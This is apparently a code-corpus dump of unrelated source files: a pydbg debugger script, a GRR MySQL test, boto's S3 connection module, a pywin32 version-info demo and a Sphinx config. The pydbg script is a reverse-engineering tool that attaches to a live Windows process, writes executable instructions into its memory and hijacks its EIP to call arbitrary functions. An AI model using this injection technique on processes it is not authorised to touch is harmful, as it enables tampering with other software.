    @param size: Size of MEM_COMMIT / PAGE_EXECUTE_READWRITE memory to allocate.
@rtype: DWORD
@return: Address of allocated memory.
'''
global dbg, allocations
if not size:
return
address = dbg.virtual_alloc(None, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
# make a record of the address/size tuple in the global allocations table.
allocations.append((address, size))
return address
########################################################################################################################
def handle_av (dbg):
'''
As we are mucking around with process state and calling potentially unknown subroutines, it is likely that we may
cause an access violation. We register this handler to provide some useful information about the cause.
'''
crash_bin = utils.crash_binning.crash_binning()
crash_bin.record_crash(dbg)
print crash_bin.crash_synopsis()
dbg.terminate_process()
########################################################################################################################
def handle_bp (dbg):
'''
This callback handler is responsible for establishing and maintaining the command-read loop. This handler seizes
control-flow at the first chance breakpoint.
At the command prompt, any Python statement can be executed. To store variables persistently across iterations over
this routine, use the "glob" global object shell. The built in commands include:
DONE, GO, G
For continuing the process. And for calling arbitrary procedures:
dpc(address, *args, **kwargs)
For more information, see the inline documentation for dpc(). Note: You *can not* directly assign the return value
from dpc(). You must explicitly assign Eax, example:
var = dpc(0xdeadbeef, "pedram") # INCORRECT
dpc(0xdeadbeef, "pedram") # CORRECT
var = dbg.context.Eax
@see: dpc()
'''
global allocations, cmd_num, saved_context, glob
log("breakpoint hit")
if not dbg.first_breakpoint:
# examine the return value.
ret = dbg.context.Eax
byte_ord = ret & 0xFF
status = "procedure call returned: %d 0x%08x" % (ret, ret)
deref = dbg.smart_dereference(ret, print_dots=False)
if byte_ord >= 32 and byte_ord <= 126:
status += " '%c'" % byte_ord
if deref != "N/A":
status += " -> %s" % deref
print status
# when we first get control, save the context of the thread we are about to muck around with.
if not saved_context:
saved_context = dbg.get_thread_context(dbg.h_thread)
# command loop.
while 1:
try:
command = raw_input("\n[%03d] CMD> " % cmd_num)
except:
return DBG_CONTINUE
if type(command) is str:
# cleanup and let the process continue execution.
if command.upper() in ["DONE", "GO", "G"]:
dbg.set_thread_context(saved_context)
free_all()
break
try:
exec(command)
cmd_num += 1
# implicit "GO" after dpc() commands.
if type(command) is str and command.lower().startswith("dpc"):
break
except:
sys.stderr.write("failed executing: '%s'.\n" % command)
log("continuing process")
return DBG_CONTINUE
########################################################################################################################
def free (address_to_free):
'''
Convenience wrapper around pydbg.virtual_free() for easily releasing allocated memory. This routine maintains
the global "allocations" table.
    @type address_to_free: DWORD
    @param address_to_free: Address of memory chunk to free.
'''
global dbg, allocations
for address, size in allocations:
if address == address_to_free:
dbg.virtual_free(address, size, MEM_DECOMMIT)
# remove the address/size tuple from the global allocations table.
allocations.remove((address, size))
########################################################################################################################
def free_all ():
'''
Free all entries in the global allocations table. Useful for when you have done a bunch of testing and want to
release all the allocated memory.
'''
global allocations
while len(allocations):
for address, size in allocations:
free(address)
########################################################################################################################
def dpc (address, *args, **kwargs):
'''
This routine is the real core of the script. Given an address and arguments it will allocate and initialize space
in the debuggee for storing the necessary instructions and arguments and then redirect EIP from the current thread
to the newly created instructions. A breakpoint is written after the assembled instruction set that is caught by
our breakpoint handler which re-prompts the user for further commands. Note: You *can not* directly assign the
return value from dpc(). You must explicitly assign Eax, example:
var = dpc(0xdeadbeef, "pedram") # INCORRECT
dpc(0xdeadbeef, "pedram") # CORRECT
var = dbg.context.Eax
@type address: DWORD
@param address: Address of procedure to call.
@type args: List
@param args: Arguments to pass to procedure.
@type kwargs: Dictionary (Keys can be one of EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP, EIP)
@param kwargs: Register values to set prior to calling procedure.
'''
global dbg, allocations, container
PUSH = "\x68"
CALL = "\xE8"
INT3 = "\xCC"
# XXX - freeing an address that bp_del is later trying to work on.
if container:
pass #free(container)
# allocate some space for our new instructions and update EIP to point into that new space.
container = eip = alloc(512)
dbg.context.Eip = eip
dbg.set_register("EIP", eip)
log("setting EIP of thread %d to 0x%08x" % (dbg.dbg.dwThreadId, eip))
# args are pushed in reverse order, make it a list and reverse it.
args = list(args)
args.reverse()
for arg in args:
log("processing argument: %s" % arg)
# if the argument is a string. allocate memory for the string, write it and set the arg to point to the string.
if type(arg) is str:
string_address = alloc(len(arg))
log(" allocated %d bytes for string at %08x" % (len(arg), string_address))
dbg.write(string_address, arg)
arg = string_address
# assemble and write the PUSH instruction.
assembled = PUSH + struct.pack("<L", arg)
log(" %08x: PUSH 0x%08x" % (eip, arg))
dbg.write(eip, assembled)
eip += len(assembled)
for reg, arg in kwargs.items():
log("processing register %s argument: %s" % (reg, arg))
if reg.upper() not in ("EAX", "EBX", "ECX", "EDX", "ESI", "EDI", "ESP", "EBP", "EIP"):
sys.stderr.write("> invalid register specified: %s\n" % reg)
continue
# if the argument is a string. allocate memory for the string, write it and set the arg to point to the string.
if type(arg) is str:
string_address = alloc(len(arg))
log(" allocated %d bytes for string at %08x" % (len(arg), string_address))
dbg.write(string_address, arg)
arg = string_address
# set the appropriate register to contain the argument value.
dbg.set_register(reg, arg)
# assemble and write the CALL instruction.
relative_address = (address - eip - 5) # -5 for the length of the CALL instruction
assembled = CALL + struct.pack("<L", relative_address)
log("%08x: CALL 0x%08x" % (eip, relative_address))
dbg.write(eip, assembled)
eip += len(assembled)
# set a breakpoint after the call.
log("setting breakpoint after CALL at %08x" % eip)
dbg.bp_set(eip, restore=False)
########################################################################################################################
def show_all ():
'''
Print a hex dump for all of the tracked allocations.
'''
global dbg, allocations
for address, size in allocations:
print dbg.hex_dump(dbg.read(address, size), address)
########################################################################################################################
if len(sys.argv) != 2:
sys.stderr.write("USAGE: debuggee_procedure_call.py <process name | pid>\n")
sys.exit(1)
dbg.set_callback(EXCEPTION_BREAKPOINT, handle_bp)
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, handle_av)
try:
pid = int(sys.argv[1])
found_target = True
except:
found_target = False
for (pid, proc_name) in dbg.enumerate_processes():
if proc_name.lower() == sys.argv[1]:
found_target = True
break
print "attaching to %d" % pid
if found_target:
dbg.attach(pid)
dbg.debug_event_loop()
else:
sys.stderr.write("target '%s' not found.\n" % sys.argv[1]) | gpl-2.0 | -7,953,247,128,727,441,000 | 33.450746 | 120 | 0.564679 | false |
darrenbilby/grr | lib/data_stores/mysql_advanced_data_store_test.py | 4 | 1560 | #!/usr/bin/env python
"""Tests the mysql data store."""
import unittest
import logging
from grr.lib import access_control
from grr.lib import data_store
from grr.lib import data_store_test
from grr.lib import flags
from grr.lib import test_lib
from grr.lib.data_stores import mysql_advanced_data_store
class MysqlAdvancedTestMixin(object):
def InitDatastore(self):
self.token = access_control.ACLToken(username="test",
reason="Running tests")
# Use separate tables for benchmarks / tests so they can be run in parallel.
with test_lib.ConfigOverrider({
"Mysql.database_name": "grr_test_%s" % self.__class__.__name__}):
try:
data_store.DB = mysql_advanced_data_store.MySQLAdvancedDataStore()
data_store.DB.flusher_thread.Stop()
data_store.DB.security_manager = test_lib.MockSecurityManager()
data_store.DB.RecreateTables()
except Exception as e:
logging.debug("Error while connecting to MySQL db: %s.", e)
raise unittest.SkipTest("Skipping since Mysql db is not reachable.")
def DestroyDatastore(self):
data_store.DB.DropTables()
def testCorrectDataStore(self):
self.assertTrue(
isinstance(data_store.DB,
mysql_advanced_data_store.MySQLAdvancedDataStore))
class MysqlAdvancedDataStoreTest(
MysqlAdvancedTestMixin, data_store_test._DataStoreTest):
"""Test the mysql data store abstraction."""
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
| apache-2.0 | -1,940,198,993,024,092,400 | 29.588235 | 80 | 0.685256 | false |
ddzialak/boto | boto/s3/connection.py | 1 | 26258 | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import base64
from boto.compat import six, urllib
import time
from boto.auth import detect_potential_s3sigv4
import boto.utils
from boto.connection import AWSAuthConnection
from boto import handler
from boto.s3.bucket import Bucket
from boto.s3.key import Key
from boto.resultset import ResultSet
from boto.exception import BotoClientError, S3ResponseError
def check_lowercase_bucketname(n):
"""
Bucket names must not contain uppercase characters. We check for
this by appending a lowercase character and testing with islower().
Note this also covers cases like numeric bucket names with dashes.
>>> check_lowercase_bucketname("Aaaa")
Traceback (most recent call last):
...
BotoClientError: S3Error: Bucket names cannot contain upper-case
characters when using either the sub-domain or virtual hosting calling
format.
>>> check_lowercase_bucketname("1234-5678-9123")
True
>>> check_lowercase_bucketname("abcdefg1234")
True
"""
if not (n + 'a').islower():
raise BotoClientError("Bucket names cannot contain upper-case " \
"characters when using either the sub-domain or virtual " \
"hosting calling format.")
return True
def assert_case_insensitive(f):
def wrapper(*args, **kwargs):
if len(args) == 3 and check_lowercase_bucketname(args[2]):
pass
return f(*args, **kwargs)
return wrapper
class _CallingFormat(object):
def get_bucket_server(self, server, bucket):
return ''
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '%s://' % protocol
url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
def build_host(self, server, bucket):
if bucket == '':
return server
else:
return self.get_bucket_server(server, bucket)
def build_auth_path(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path = ''
if bucket != '':
path = '/' + bucket
return path + '/%s' % urllib.parse.quote(key)
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
return '/%s' % urllib.parse.quote(key)
class SubdomainCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return '%s.%s' % (bucket, server)
class VHostCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return bucket
class OrdinaryCallingFormat(_CallingFormat):
def get_bucket_server(self, server, bucket):
return server
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path_base = '/'
if bucket:
path_base += "%s/" % bucket
return path_base + urllib.parse.quote(key)
class ProtocolIndependentOrdinaryCallingFormat(OrdinaryCallingFormat):
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '//'
url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
class Location(object):
DEFAULT = '' # US Classic Region
EU = 'EU'
USWest = 'us-west-1'
USWest2 = 'us-west-2'
SAEast = 'sa-east-1'
APNortheast = 'ap-northeast-1'
APSoutheast = 'ap-southeast-1'
APSoutheast2 = 'ap-southeast-2'
CNNorth1 = 'cn-north-1'
class NoHostProvided(object):
# An identifying object to help determine whether the user provided a
# ``host`` or not. Never instantiated.
pass
class HostRequiredError(BotoClientError):
pass
class S3Connection(AWSAuthConnection):
DefaultHost = boto.config.get('s3', 'host', 's3.amazonaws.com')
DefaultCallingFormat = boto.config.get('s3', 'calling_format', 'boto.s3.connection.SubdomainCallingFormat')
QueryString = 'Signature=%s&Expires=%d&AWSAccessKeyId=%s'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None,
host=NoHostProvided, debug=0, https_connection_factory=None,
calling_format=DefaultCallingFormat, path='/',
provider='aws', bucket_class=Bucket, security_token=None,
suppress_consec_slashes=True, anon=False,
validate_certs=None, profile_name=None):
no_host_provided = False
if host is NoHostProvided:
no_host_provided = True
host = self.DefaultHost
if isinstance(calling_format, six.string_types):
calling_format=boto.utils.find_class(calling_format)()
self.calling_format = calling_format
self.bucket_class = bucket_class
self.anon = anon
super(S3Connection, self).__init__(host,
aws_access_key_id, aws_secret_access_key,
is_secure, port, proxy, proxy_port, proxy_user, proxy_pass,
debug=debug, https_connection_factory=https_connection_factory,
path=path, provider=provider, security_token=security_token,
suppress_consec_slashes=suppress_consec_slashes,
validate_certs=validate_certs, profile_name=profile_name)
# We need to delay until after the call to ``super`` before checking
# to see if SigV4 is in use.
if no_host_provided:
if 'hmac-v4-s3' in self._required_auth_capability():
raise HostRequiredError(
"When using SigV4, you must specify a 'host' parameter."
)
@detect_potential_s3sigv4
def _required_auth_capability(self):
if self.anon:
return ['anon']
else:
return ['s3']
def __iter__(self):
for bucket in self.get_all_buckets():
yield bucket
def __contains__(self, bucket_name):
return not (self.lookup(bucket_name) is None)
def set_bucket_class(self, bucket_class):
"""
        Set the Bucket class associated with this connection. By default, this
        would be the boto.s3.bucket.Bucket class, but if you want to subclass
        that for some reason, this allows you to associate your new class.
:type bucket_class: class
:param bucket_class: A subclass of Bucket that can be more specific
"""
self.bucket_class = bucket_class
def build_post_policy(self, expiration_time, conditions):
"""
Taken from the AWS book Python examples and modified for use with boto
"""
assert isinstance(expiration_time, time.struct_time), \
'Policy document must include a valid expiration Time object'
# Convert conditions object mappings to condition statements
return '{"expiration": "%s",\n"conditions": [%s]}' % \
(time.strftime(boto.utils.ISO8601, expiration_time), ",".join(conditions))
def build_post_form_args(self, bucket_name, key, expires_in=6000,
acl=None, success_action_redirect=None,
max_content_length=None,
http_method='http', fields=None,
conditions=None, storage_class='STANDARD',
server_side_encryption=None):
"""
Taken from the AWS book Python examples and modified for use with boto
This only returns the arguments required for the post form, not the
        actual form. This does not return the file input field, which also
        needs to be added.
:type bucket_name: string
:param bucket_name: Bucket to submit to
:type key: string
:param key: Key name, optionally add ${filename} to the end to
attach the submitted filename
:type expires_in: integer
:param expires_in: Time (in seconds) before this expires, defaults
to 6000
:type acl: string
:param acl: A canned ACL. One of:
* private
* public-read
* public-read-write
* authenticated-read
* bucket-owner-read
* bucket-owner-full-control
:type success_action_redirect: string
:param success_action_redirect: URL to redirect to on success
:type max_content_length: integer
:param max_content_length: Maximum size for this file
:type http_method: string
:param http_method: HTTP Method to use, "http" or "https"
:type storage_class: string
:param storage_class: Storage class to use for storing the object.
Valid values: STANDARD | REDUCED_REDUNDANCY
:type server_side_encryption: string
:param server_side_encryption: Specifies server-side encryption
algorithm to use when Amazon S3 creates an object.
Valid values: None | AES256
:rtype: dict
:return: A dictionary containing field names/values as well as
a url to POST to
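        Example usage (an illustrative sketch, not from the original
        documentation; ``conn`` is assumed to be an S3Connection and the
        bucket name, key and limits below are placeholder values):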
.. code-block:: python
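            # Illustrative values only; adjust bucket, key and limits as needed.
            post = conn.build_post_form_args(
                'mybucket', 'uploads/${filename}',
                expires_in=3600, acl='public-read',
                max_content_length=10485760)
            # post['action'] is the URL to POST the form to; post['fields'] is
            # a list of {"name": ..., "value": ...} dicts to render as hidden
            # form fields alongside the file input.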
"""
if fields is None:
fields = []
if conditions is None:
conditions = []
expiration = time.gmtime(int(time.time() + expires_in))
# Generate policy document
conditions.append('{"bucket": "%s"}' % bucket_name)
if key.endswith("${filename}"):
conditions.append('["starts-with", "$key", "%s"]' % key[:-len("${filename}")])
else:
conditions.append('{"key": "%s"}' % key)
if acl:
conditions.append('{"acl": "%s"}' % acl)
fields.append({"name": "acl", "value": acl})
if success_action_redirect:
conditions.append('{"success_action_redirect": "%s"}' % success_action_redirect)
fields.append({"name": "success_action_redirect", "value": success_action_redirect})
if max_content_length:
conditions.append('["content-length-range", 0, %i]' % max_content_length)
if self.provider.security_token:
fields.append({'name': 'x-amz-security-token',
'value': self.provider.security_token})
conditions.append('{"x-amz-security-token": "%s"}' % self.provider.security_token)
if storage_class:
fields.append({'name': 'x-amz-storage-class',
'value': storage_class})
conditions.append('{"x-amz-storage-class": "%s"}' % storage_class)
if server_side_encryption:
fields.append({'name': 'x-amz-server-side-encryption',
'value': server_side_encryption})
conditions.append('{"x-amz-server-side-encryption": "%s"}' % server_side_encryption)
policy = self.build_post_policy(expiration, conditions)
# Add the base64-encoded policy document as the 'policy' field
policy_b64 = base64.b64encode(policy)
fields.append({"name": "policy", "value": policy_b64})
# Add the AWS access key as the 'AWSAccessKeyId' field
fields.append({"name": "AWSAccessKeyId",
"value": self.aws_access_key_id})
# Add signature for encoded policy document as the
# 'signature' field
signature = self._auth_handler.sign_string(policy_b64)
fields.append({"name": "signature", "value": signature})
fields.append({"name": "key", "value": key})
# HTTPS protocol will be used if the secure HTTP option is enabled.
url = '%s://%s/' % (http_method,
self.calling_format.build_host(self.server_name(),
bucket_name))
return {"action": url, "fields": fields}
def generate_url_sigv4(self, expires_in, method, bucket='', key='',
headers=None, force_http=False,
response_headers=None, version_id=None,
iso_date=None):
path = self.calling_format.build_path_base(bucket, key)
auth_path = self.calling_format.build_auth_path(bucket, key)
host = self.calling_format.build_host(self.server_name(), bucket)
# For presigned URLs we should ignore the port if it's HTTPS
if host.endswith(':443'):
host = host[:-4]
params = {}
if version_id is not None:
params['VersionId'] = version_id
http_request = self.build_base_http_request(method, path, auth_path,
headers=headers, host=host,
params=params)
return self._auth_handler.presign(http_request, expires_in,
iso_date=iso_date)
def generate_url(self, expires_in, method, bucket='', key='', headers=None,
query_auth=True, force_http=False, response_headers=None,
expires_in_absolute=False, version_id=None):
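        # Build a time-limited URL for bucket/key.  When query_auth is True the
        # Signature, Expires and AWSAccessKeyId query parameters are appended;
        # otherwise an unsigned URL is returned.  SigV4-style signing is
        # delegated to generate_url_sigv4() above.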
if self._auth_handler.capability[0] == 'hmac-v4-s3':
# Handle the special sigv4 case
return self.generate_url_sigv4(expires_in, method, bucket=bucket,
key=key, headers=headers, force_http=force_http,
response_headers=response_headers, version_id=version_id)
headers = headers or {}
if expires_in_absolute:
expires = int(expires_in)
else:
expires = int(time.time() + expires_in)
auth_path = self.calling_format.build_auth_path(bucket, key)
auth_path = self.get_path(auth_path)
# optional version_id and response_headers need to be added to
# the query param list.
extra_qp = []
if version_id is not None:
extra_qp.append("versionId=%s" % version_id)
if response_headers:
for k, v in response_headers.items():
extra_qp.append("%s=%s" % (k, urllib.parse.quote(v)))
if self.provider.security_token:
headers['x-amz-security-token'] = self.provider.security_token
if extra_qp:
delimiter = '?' if '?' not in auth_path else '&'
auth_path += delimiter + '&'.join(extra_qp)
c_string = boto.utils.canonical_string(method, auth_path, headers,
expires, self.provider)
b64_hmac = self._auth_handler.sign_string(c_string)
encoded_canonical = urllib.parse.quote(b64_hmac, safe='')
self.calling_format.build_path_base(bucket, key)
if query_auth:
query_part = '?' + self.QueryString % (encoded_canonical, expires,
self.aws_access_key_id)
else:
query_part = ''
if headers:
hdr_prefix = self.provider.header_prefix
for k, v in headers.items():
if k.startswith(hdr_prefix):
# headers used for sig generation must be
# included in the url also.
extra_qp.append("%s=%s" % (k, urllib.parse.quote(v)))
if extra_qp:
delimiter = '?' if not query_part else '&'
query_part += delimiter + '&'.join(extra_qp)
if force_http:
protocol = 'http'
port = 80
else:
protocol = self.protocol
port = self.port
return self.calling_format.build_url_base(self, protocol,
self.server_name(port),
bucket, key) + query_part
def get_all_buckets(self, headers=None):
response = self.make_request('GET', headers=headers)
body = response.read()
if response.status > 300:
raise self.provider.storage_response_error(
response.status, response.reason, body)
rs = ResultSet([('Bucket', self.bucket_class)])
h = handler.XmlHandler(rs, self)
if not isinstance(body, bytes):
body = body.encode('utf-8')
xml.sax.parseString(body, h)
return rs
def get_canonical_user_id(self, headers=None):
"""
Convenience method that returns the "CanonicalUserID" of the
        user whose credentials are associated with the connection.
The only way to get this value is to do a GET request on the
service which returns all buckets associated with the account.
As part of that response, the canonical userid is returned.
This method simply does all of that and then returns just the
user id.
:rtype: string
:return: A string containing the canonical user id.
"""
rs = self.get_all_buckets(headers=headers)
return rs.owner.id
def get_bucket(self, bucket_name, validate=True, headers=None):
"""
Retrieves a bucket by name.
If the bucket does not exist, an ``S3ResponseError`` will be raised. If
you are unsure if the bucket exists or not, you can use the
``S3Connection.lookup`` method, which will either return a valid bucket
or ``None``.
If ``validate=False`` is passed, no request is made to the service (no
charge/communication delay). This is only safe to do if you are **sure**
the bucket exists.
If the default ``validate=True`` is passed, a request is made to the
service to ensure the bucket exists. Prior to Boto v2.25.0, this fetched
a list of keys (but with a max limit set to ``0``, always returning an empty
list) in the bucket (& included better error messages), at an
increased expense. As of Boto v2.25.0, this now performs a HEAD request
(less expensive but worse error messages).
If you were relying on parsing the error message before, you should call
something like::
bucket = conn.get_bucket('<bucket_name>', validate=False)
bucket.get_all_keys(maxkeys=0)
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
:type validate: boolean
:param validate: If ``True``, it will try to verify the bucket exists
on the service-side. (Default: ``True``)
"""
if validate:
return self.head_bucket(bucket_name, headers=headers)
else:
return self.bucket_class(self, bucket_name)
def head_bucket(self, bucket_name, headers=None):
"""
Determines if a bucket exists by name.
If the bucket does not exist, an ``S3ResponseError`` will be raised.
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
:returns: A <Bucket> object
"""
response = self.make_request('HEAD', bucket_name, headers=headers)
body = response.read()
if response.status == 200:
return self.bucket_class(self, bucket_name)
elif response.status == 403:
# For backward-compatibility, we'll populate part of the exception
# with the most-common default.
err = self.provider.storage_response_error(
response.status,
response.reason,
body
)
err.error_code = 'AccessDenied'
err.error_message = 'Access Denied'
raise err
elif response.status == 404:
# For backward-compatibility, we'll populate part of the exception
# with the most-common default.
err = self.provider.storage_response_error(
response.status,
response.reason,
body
)
err.error_code = 'NoSuchBucket'
err.error_message = 'The specified bucket does not exist'
raise err
else:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def lookup(self, bucket_name, validate=True, headers=None):
"""
Attempts to get a bucket from S3.
Works identically to ``S3Connection.get_bucket``, save for that it
will return ``None`` if the bucket does not exist instead of throwing
an exception.
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
:type validate: boolean
:param validate: If ``True``, it will try to fetch all keys within the
given bucket. (Default: ``True``)
"""
try:
bucket = self.get_bucket(bucket_name, validate, headers=headers)
except:
bucket = None
return bucket
def create_bucket(self, bucket_name, headers=None,
location=Location.DEFAULT, policy=None):
"""
Creates a new located bucket. By default it's in the USA. You can pass
Location.EU to create a European bucket (S3) or European Union bucket
(GCS).
:type bucket_name: string
:param bucket_name: The name of the new bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to AWS.
:type location: str
:param location: The location of the new bucket. You can use one of the
constants in :class:`boto.s3.connection.Location` (e.g. Location.EU,
Location.USWest, etc.).
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
"""
if (location and not location.startswith("us-")):
check_lowercase_bucketname(bucket_name)
if policy:
if headers:
headers[self.provider.acl_header] = policy
else:
headers = {self.provider.acl_header: policy}
if location == Location.DEFAULT:
data = ''
else:
data = '<CreateBucketConfiguration><LocationConstraint>' + \
location + '</LocationConstraint></CreateBucketConfiguration>'
response = self.make_request('PUT', bucket_name, headers=headers,
data=data)
body = response.read()
if response.status == 409:
raise self.provider.storage_create_error(
response.status, response.reason, body)
if response.status == 200:
return self.bucket_class(self, bucket_name)
else:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def delete_bucket(self, bucket, headers=None):
"""
Removes an S3 bucket.
In order to remove the bucket, it must first be empty. If the bucket is
not empty, an ``S3ResponseError`` will be raised.
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
"""
response = self.make_request('DELETE', bucket, headers=headers)
body = response.read()
if response.status != 204:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def make_request(self, method, bucket='', key='', headers=None, data='',
query_args=None, sender=None, override_num_retries=None,
retry_handler=None):
if isinstance(bucket, self.bucket_class):
bucket = bucket.name
if isinstance(key, Key):
key = key.name
path = self.calling_format.build_path_base(bucket, key)
#boto.log.debug('path=%s' % path)
auth_path = self.calling_format.build_auth_path(bucket, key)
#boto.log.debug('auth_path=%s' % auth_path)
host = self.calling_format.build_host(self.server_name(), bucket)
if query_args:
path += '?' + query_args
#boto.log.debug('path=%s' % path)
auth_path += '?' + query_args
#boto.log.debug('auth_path=%s' % auth_path)
return super(S3Connection, self).make_request(
method, path, headers,
data, host, auth_path, sender,
override_num_retries=override_num_retries,
retry_handler=retry_handler
)
| mit | -8,775,643,437,793,005,000 | 38.426426 | 111 | 0.59757 | false |
beiko-lab/gengis | bin/Lib/site-packages/win32/Demos/getfilever.py | 4 | 1087 | import os, win32api
ver_strings=('Comments','InternalName','ProductName',
'CompanyName','LegalCopyright','ProductVersion',
'FileDescription','LegalTrademarks','PrivateBuild',
'FileVersion','OriginalFilename','SpecialBuild')
fname = os.environ["comspec"]
d=win32api.GetFileVersionInfo(fname, '\\')
## backslash as param returns a dictionary of numeric info corresponding to the VS_FIXEDFILEINFO struct
for n, v in d.iteritems():
print n, v
pairs=win32api.GetFileVersionInfo(fname, '\\VarFileInfo\\Translation')
## \VarFileInfo\Translation returns a list of available (language, codepage) pairs that can be used to retrieve string info
## any other query must be of the form \StringFileInfo\%04X%04X\param_name, where the middle two are a language/codepage pair returned from above
for lang, codepage in pairs:
print 'lang: ', lang, 'codepage:', codepage
for ver_string in ver_strings:
str_info=u'\\StringFileInfo\\%04X%04X\\%s' %(lang,codepage,ver_string)
## print str_info
print ver_string, repr(win32api.GetFileVersionInfo(fname, str_info))
| gpl-3.0 | -2,031,292,292,911,051,800 | 49.761905 | 126 | 0.720331 | false |
johngian/remo | docs/conf.py | 8 | 7229 | # -*- coding: utf-8 -*-
#
# playdoh documentation build configuration file, created by
# sphinx-quickstart on Tue Jan 4 15:11:09 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ReMo Portal'
copyright = u'2011-2012, ReMo Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.2.5'
# The full version, including alpha/beta/rc tags.
release = '0.2.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
